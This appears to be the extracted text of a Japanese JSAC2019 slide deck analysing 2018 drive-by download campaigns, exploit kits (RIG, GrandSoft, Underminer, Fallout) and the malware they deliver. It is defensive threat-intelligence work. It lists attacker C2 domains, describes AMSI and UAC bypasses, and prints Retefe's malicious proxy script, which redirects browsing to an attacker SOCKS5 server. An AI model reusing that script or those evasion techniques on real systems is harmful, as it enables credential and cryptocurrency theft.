JSAC2019

Size: px

Start display at page:

Download "JSAC2019"

はるまさてっちがわら
5 years ago
Views:

2 自己紹介小池倫太郎セキュリティエンジニア (1 年生 ) nao_sec でマルウェア解析以外を担当専門は悪性トラフィックスクリプトの解析中島将太フォレンジッカーマルウェアアナリスト (1 年生 ) nao_sec ではマルウェアやシェルコード解析を担当 2

3 Drive-by Download 攻撃 ver 2017 攻撃キャンペーン pseudo-darkleech と EITest の活動停止 Seamless Fobos Rulan Ngay の出現と活発化 Malvertising 系の攻撃キャンペーンの繁栄 Exploit Kit Nebula と Disdain の出現と消滅 RIG の繁栄 Shadowfall による Domain Shadowing の停止 IP アドレスを用いた URL へ移行 ( 参考 : 3

4 Drive-by Download 攻撃 ver 2018 攻撃キャンペーン Seamless(PseudoGate) と HookAds の繁栄 CoinsLTD や SlyIP Slots の登場と消滅 BlackTDS の登場 Exploit Kit Underminer と Fallout の登場と繁栄 RIG の衰退 GrandSoft の復活新たな脆弱性の悪用 4

5 新たな脆弱性 CVE Adobe Flash Player の RCE Magnitude RIG Fallout などで悪用 CVE VBScript Engine の RCE RIG Magnitude GrandSoft Fallout KaiXin などで悪用 CVE VBScript Engine の RCE KaiXin や Fallout などで悪用 CVE Adobe Flash Player の RCE Fallout や Underminer などで悪用 5

6 攻撃キャンペーン 6

7 Seamless / PseudoGate 3 月頃から Seamless の活動が停止代わりに 7 月頃から PseudoGate が登場し活発化両方とも日本カナダアメリカが標的 Banking Trojan 特に Ramnit を頻繁に使用 Seamless と PseudoGate は同一 Actor の可能性? 7

8 Seamless / PseudoGate Seamless Malvertising Pre-Gate と Gate を用いて RIG へ誘導ユーザの地理的情報を用いて処理を分岐標的は日本カナダアメリカ主に Ramnit を使用 8

9 Seamless / PseudoGate PseudoGate Malvertising 正規の Web サイトを改ざんして使用することがある検知や遮断が困難 GrandSoft や RIG を使用 Panda Banker や Osiris(Kronos) Ramnit などを使用日本カナダのクレジットカード銀行などの情報を窃取 9

10 HookAds Malvertising Decoy サイトと Gate を使って攻撃を行う Kraken Cryptor や GlobeImposter GandCrab などのランサムウェアを使うことが多い 10

11 HookAds Decoy サイトと Gate

12 Exploit Kit 12

13 RIG Exploit Kit 概要 2014 年頃から観測されている Exploit Kit 2016 年 9 月以降最も活発非常に多くの攻撃キャンペーンで利用されている Fallout の登場でシェアは大幅に減少それでも多くの攻撃キャンペーンが使用基本的な機能構成は昨年から変化せず 13

14 RIG Exploit Kit トラフィック 3 つのトラフィックによって攻撃が行われる 1. Landing Page CVE CVE CVE CVE SWF Exploit を読み込むための html 2. SWF Exploit( 他の脆弱性が悪用された場合は発生しない ) CVE Malware Payload RC4 によって暗号化されたマルウェア 14

15 RIG Exploit Kit Landing Page 難読化は以前よりも簡単に 15

16 RIG Exploit Kit Malware Payload RC4 Encode 16

RIG Exploit Kit Landing Page の URL を生成する API のエンドポイントは BlackHat Asia 2018 で発表されており変化なし ( 引用元 :https://www.blackhat.

17 RIG Exploit Kit Landing Page の URL を生成する API のエンドポイントは BlackHat Asia 2018 で発表されており変化なし ( 引用元 : 17

18 RIG Exploit Kit 利用されたIPアドレスの分布ロシア:2325, ドイツ:106, ウクライナ:8, カザフスタン6 18

19 GrandSoft Exploit Kit 2018 年 2 月頃から再度活発化 2012 年頃から観測されている PseudoGate で頻繁に利用されている 19

20 GrandSoft Exploit Kit 20

21 GrandSoft Exploit Kit 21

22 Underminer Exploit Kit 2018 年 7 月頃から観測され始めた日本を中心とした東アジア圏で活発処理を公開鍵暗号で隠すことで解析を妨害トラフィックデータを見ただけでは解析することは困難 22

23 Underminer Exploit Kit 23

24 Underminer Exploit Kit form を使ってリダイレクト送信情報にクライアント環境データを含む 24

25 Underminer Exploit Kit 25

26 Underminer Exploit Kit 26

27 Underminer Exploit Kit 1 公開鍵をダウンロード Random String 2 文字列生成 3 公開鍵で暗号化して送信 Random String ユーザ環境 Random String 4 秘密鍵で復号 Random String 5 文字列で暗号化したデータを送信 Underminer 6 データを復号して実行 27

28 Underminer Exploit Kit 28

29 Underminer Exploit Kit 29

30 Fallout Exploit Kit 2018 年 8 月頃から観測され始めた非常に活発多くの攻撃キャンペーンで利用されている RIG の商売敵 HTML から Exploitation に必要なコードを生成 Nuclear Exploit Kit に類似 URL に特徴がないフィルタや検知が困難 30

31 Fallout Exploit Kit 31

32 Fallout Exploit Kit Custom Base64 32

33 Fallout Exploit Kit RC4 33

34 Fallout Exploit Kit CVE 基本的には PoC と同じ 34

35 Fallout Exploit Kit CVE Shellcode 部分以外は PoC と全く同じ 35

36 Fallout Exploit Kit 36

37 Exploitation(shellcode) 37

38 CVE (RIG) RIG Exploit Kit 1 バイトの xor でシェルコードの後半をエンコード CreateProcessA でダウンロードしたマルウェアを実行 38

CVE-2018-8174 (GrandSoft) 6 月下旬以前のフロー 1. ランダム値の生成 2.

39 CVE (GrandSoft) 6 月下旬以前のフロー 1. ランダム値の生成 2. ランダム値を使った鍵生成 3. 鍵を URL の末尾に追加 4. 暗号化されたマルウェアのダウンロード 5. デコード * in shellcode 39

CVE-2018-8174 (GrandSoft) 6 月下旬以降のフロー 1. ランダム値の生成 2.

40 CVE (GrandSoft) 6 月下旬以降のフロー 1. ランダム値の生成 2. 鍵を URL の末尾に追加 3. 暗号化されたマルウェアのダウンロード 4. デコード * in shellcode 40

41 CVE (Fallout) シェルコードの後半を 1 バイト xor でエンコード 41

42 CVE (Fallout) ハードコードされた鍵で xor 42

43 CVE (Fallout) 1/17 に観測! シェルコードで PowerShell をデコードして CreateProessA で実行 43

44 CVE (Fallout) Anti Malware Scan Interface を Bypass マルウェアをダウンロード 44

45 CVE (Fallout) CreateProcess を C# で定義しマルウェアを実行 45

46 CVE (Fallout) シェルコードはほぼ 8174 と同じ Anti Malware Scan Interface の Bypass マルウェアをダウンロードし IEX で実行 46

47 CVE (Underminer) API は add1505shl5hash32 でハッシュ化されている wininet API で WAV ファイルをダウンロード 47

48 CVE (Underminer) WAV ファイルをパースしてデータを復号 48

PoC 公開から観測まで EK で利用される CVE の殆どが PoC を流用している公開観測 Rig 2018-05-25 GrandSoft 2018-06-14

49 PoC 公開から観測まで EK で利用される CVE の殆どが PoC を流用している公開観測 Rig GrandSoft Fallout ソース : 49

50 マルウェア 50

51 RIG Exploit Kit Banking Trojan Ransomware Miner Info Stealer RAT GandCrab Slyip Ursnif ZeusPanda SmokeLoader Seamless/PseudoGate Ramnit DarkVNC Kronos Miner HookAds Clipboard Hijacker AZORult Retefe GandCrab Unknown 51 Ursnif AZORult BabylonRAT

52 GrandSoft Exploit Kit Banking Trojan Miner Ransomware Miner BlackTDS GandCrab GandCrab Slyip Ursnif SmokeLoader ZeusPanda PseudoGate AZORult Ramnit AZORult 52

com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/

53 Underminer Exploit Kit Trend Micro Malwarebytesのブログによるとシステムのブートセクタを改変するbootkitとMinerを配布

54 Fallout Exploit Kit Banking Trojan Ransomware Miner Info Stealer RAT SmokeLoader GandCrab Unknown SAVEfiles Ransomware AZORult Ursnif Dridex Paradise Ransomware Vidar Vidar Kraken Cryptor HookAds GlobeImposter Miner SmokeLoader AZORult KPOT GlobeImposter+ CoalaBot NetWireRAT 54

55 AZORult Info Stealer & Downloader 対象ソフトのアカウント情報ブラウザ履歴 cookie 仮想通貨ウォレットマルウェアのダウンロード Malspam Exploit Kit で配布 2018 年は v3.2(7/17) と v3.3(10/4) にバージョンアップ Underground forum(exploit.in) で宣伝されている引用元 :The Emergence of the New Azorult Check Point Research 55

56 AZORult 何度もBuilderとPanelがリークしている 56

57 AZORult キャンペーン毎に窃取する情報が変化 HookAds と PseudoGate では収集する対象が異なる仮想通貨ウォレット

58 AZORult の config Builder Config に細かくウォレットを指定する項目はないバージョンによる差異ではないかと考えられる 58

59 AZORult の C2 nagoyashi.chimkent[.]su RU MAROSNET infolocalip[.]com US Hostwinds po0o0o0o[.]at RU timeweb fyreplittgothin.pw RU VDSina IP でアクセスすることも http[:]// /index.php SG DigitalOcean http[:]// /index.php RU timeweb 59

60 Ramnit Banking Trojan Seamless キャンペーンで長期間使われていた以下のモジュールを使用 Antivirus Trusted Module v2.0 (AVG Avast Nod32 Norton Bitdefender) アンチウイルスソフトの例外リストに追加 Cookie Grabber v0.5 (IE&CH Export) ブラウザのクッキーの収集 IE & Chrome & FF injector ブラウザへインジェクション VNC (23 port) x64-x86 FF&Chrome reinstall x64-x86 [silent] ブラウザの再インストール Pony based pwd stealer パスワード窃取 60

61 Ramnit の C2 revivalresumed[.]com RU Argotel goldenfreeanhfirst[.]com RU 1stVDS simsim.adygeya[.]su NL Melbicom UAB( ロシアの VPS サービス ) newwfreedomaincom[.]com UA time-host 61

62 Kronos/Osiris 2014 年に登場した 2018 年に Kronos をアップデートした Osiris が登場 RigEK から Drop した Smoke Loader がダウンロード引用元 : 62

63 Osiris 通信先やファイル名の特徴から Osiris と思われる hxxp://fritsy83[.]website/osiris.exe hxxp://oo00mika84[.]website/osiris_jmjp_auto2_noinj.exe Osiris_jmjp_auto2!?Kronos 63

64 Kronos と Osiris の類似点ハードコードされた文字列 yaraルールでの検出 = バイナリの特徴が同じ文字列 C2のエンコードアルゴリズム Kronos+Tor=Osiris? 64

65 GandCrab 2018 年 1 月下旬に登場したランサムウェア様々攻撃で使用されている Malspam Fake Flash Exploit Kit 感染地域も広域マーケティングアップデートも活発販売時にリサーチャーのブログやツイートを引用 65

66 GandCrabのバージョン Fake Adobe Flash Player 経由でも配布 v1のdecryptorリリース v1.x Jan v5.0 v3.0 Feb Seamless経由で初観測 Mar Apr May Jul v4.x v2.x 拡張子の変化 GDCB KRAB 66 拡張子の変化 KRAB ランダム5文字 Sep Dec ネットワーク共有を探す利用の暗号アルゴリズムの変化 AES Salsa20

67 ReflectiveDLLInjection V1.1 V2.x V3.x で使用ディスクではなくメモリ上から DLL を読み込むテクニック 67

68 他プロセスへインジェクション V2.1 exploerer.exe V3 svchost.exe ReflectiveDLLInjection を使う 68

69 自プロセスの書き換え V1, V4 以降メモリ上の自プロセスの領域の一部を書き換える 69

70 解析環境の検知 GetVolumeInformation API の値を比較して any.run を検知してメッセージボックスを表示 70

71 解析環境の検知メッセージは xor でエンコードして保持していた 71

72 GandCrab の C2 v4 までは.bit というトップレベルドメイン (TLD) を使用していた Namecoin が提供する特殊な TLD 独自の DNS を使用 ns1.cloud-name[.]ru ns1.wowservers[.]ru ドメイン名でよく遊んでいる 72

73 GandCrab の C2 Namecoin 側は実際には Namecoin が提供する DNS を使用せずに非公式のミラーサービス dnspod.com を利用しているので無関係と弁明より引用 73

74 GandCrabのC2 Namecoin側は実際にはNamecoinが提供するDNSを使用せずに非公式のミラーサービスdnspod.comを利用しているので無関係と弁明 GandCrabはNamecoinを使ってないので Namecoinドメインを殺しても何の効果もない 74

75 GandCrab の C2 75

76 GandCrab の C2 v4.0 インターネットに接続してない場合も暗号化される通信なし v4.1 以降は通常のドメインを使用ハードコードされたリストを使用パスをランダムに組み合わせる 76

77 v1.x テキストのみ 77

78 v2.x 78

79 v3.x 79

80 v4.x 80

81 v5.0 ransom noteが日本語に対応 81

82 v5.0.3 ransom noteが戻ってた 82

83 キーボードタイプの取得ロシア語の設定の場合は動作せず 83

84 UIの言語設定の取得 v4以降に追加 UIの言語設定を確認して該当する場合は暗号化しないロシア語 0x419 ウクライナ語 0x422 ベラルーシ語 0x423 タジク語 0x428 アルメニア語 0x42B アゼルバイジャン語 0x42C / 0x82C グルジア語 0x437 カザフスタン 0x43F キルギス語 0x440 トルクメン語 0x442 タタール語 0x444 ルーマニア語 0x818 モルドバ語 0x819 ウズベキスタン語 0x843 84

85 Kraken Cryptor 今年8月下旬に登場したランサムウェア Fallout経由で拡散 ransomware-as-a-service (RaaS).NET Frameworkで実装され難読化されている v v2.2

86 Kraken Cryptor の対象地域 10/21 に Kraken の作者によって公開された被害の割合旧ソ連圏諸国を除外アルメニアアゼルバイジャンベラルーシエストニアジョージアイランカザフスタンキルギスラトビアリトアニアモルドバロシアタジキスタン引用元 : fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/ トルクメニスタンウクライナウズベキスタン 86

87 eventvwr.exe を利用した UAC 回避 V1.6 のローダーで使用 eventvwr.exe は実行時に以下のレジストリに登録されたパスのファイルを管理者権限で実行する 87

88 SDelete を使った削除バッチの実行 88

89 config v1.6 89

90 config v2.2 90

91 KPOT Stealer 2018 年 8 月頃に見つかった Information stealer 91

92 KPOT panel C2 パネルのソースコードがリークしている 92

93 KPOT の収集する情報 config で制御可能端末情報ブラウザビデオチャットなどの保存されたデータ 93

94 Retefe Info Stealer プロキシ設定を追加する C: Users user AppData Roaming Mozilla Firefox Profiles の prefs.js function FindProxyForURL(url, host)(var proxy = "SOCKS5 coughsmoggyspark.co:5555;"; var hosts = new Array('blockchain.info', 'blockchain.com', '*twitter.com*', '*google.*'); for (var i = 0; i < hosts.length; { if (shexpmatch(host, hosts[i])) { return proxy } } return "DIRECT") 94

95 Clipboard Hijacker クリップボードにビットコインのアドレスがコピーされると攻撃者の用意したアドレスに置き換える AddClipboardFormatListener を使ってクリップボードの変化を監視ビットコインのアドレスとして valid なら置換する 95

96 Clipboard Hijacker リソース領域にエンコードしたアドレスを保持 96

97 まとめ 97

98 まとめ新たな Exploit Kit の登場 Underminer Exploit Kit 公開鍵と独自のマルウェア Fallout Exploit Kit 特徴のない URL 新たな脆弱性の悪用 CVE 日本を標的とした攻撃キャンペーン PseudoGate Ramnit AZORult Panda Banker Osiris HookAds Kraken Cryptor GlobeImposter GandCrab 98

99 まとめロシア語を中心としたフォーラムで宣伝販売リサーチャーに対するメッセージソースコード内のコメント言語設定による感染の有無ロシア語圏旧ソ連圏諸国を対象外とする種類は減ったがランサムウェアの開発感染は活発特に GandCrab 明示的に日本を対象としたマルウェアも多数存在する Banking Trojan マイナーは下半期は下火しかし仮想通貨が狙われなくなったわけではない必要な解析環境日本を対象とした攻撃の解析には日本語環境や日本の IP の環境が必要となるパブリックなサンドボックス解析を検知し挙動を変更 99

100 Any Questions? 100

Drive-by Download Must Die

Drive-by Download Must Die Japan Computer Emergency Response Team Coordination Center 電子署名者 : Japan Computer Emergency Response Team Coordination Center DN : c=jp, st=tokyo, l=chiyoda-ku, email=office@jpcert.or.jp, o=japan Computer